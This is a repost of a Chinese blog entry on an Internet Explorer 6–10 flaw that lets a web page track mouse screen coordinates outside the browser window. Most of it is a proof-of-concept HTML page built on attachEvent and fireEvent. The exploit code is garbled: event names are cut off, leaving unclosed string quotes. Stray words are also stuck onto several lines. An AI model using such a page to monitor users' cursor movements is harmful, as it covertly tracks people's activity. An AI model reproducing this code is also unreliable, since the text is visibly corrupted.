IE瀏覽器鼠標座標跟蹤安全風險,通殺全版本---IE的最大特點
剛在Seclist上又看到了IE漏洞。該漏洞的主要影響是可以跟蹤鼠標座標位置,即便當前鼠標位置位於非瀏覽器窗口。該漏洞最早被spider.io團隊發現。javascript
影響版本:IE6-10html
測試:java
在系統目錄下新建一個html文件,代碼以下:瀏覽器
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Exploit Demo</title>
<script type="text/javascript">
window.attachEvent(" function() {
var detector = document.getElementById("detector");
detector.attachEvent(" function (e) {
detector.innerHTML = e.screenX + ", " + e.screenY;
});
setInterval(function () {
detector.fireEvent(" }, 100);
});
</script>
</head>
<body>
<div id="detector"></div>
</body>
</html>
用IE打開新建的html文件
http://perlin.blog.51cto.com/1202304/1123397ide
相關文章
- 1. IE瀏覽器歷史版本圖標大全
- 2. IE 瀏覽器中鼠標點擊功能 ScrollIntoView 參數使用
- 3. IE瀏覽器快捷鍵大全
- 4. IE瀏覽器歷史版本號大全
- 5. IE安全系列:IE瀏覽器的技術變遷(下)
- 6. IE安全系列:IE瀏覽器的技術變遷(上)
- 7. IE 瀏覽器的 全局捕獲
- 8. 瀏覽器安全標記
- 9. html5 video標籤在低版本ie瀏覽器下怎麼辦?
- 10. Kiosk模式:IE瀏覽器中的IE全屏模式
- 更多相關文章...
- • Docker 命令大全 - Docker教程
- • ASP.NET MVC - 安全 - ASP.NET 教程
- • Tomcat學習筆記(史上最全tomcat學習筆記)
- • JDK13 GA發佈:5大特性解讀
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
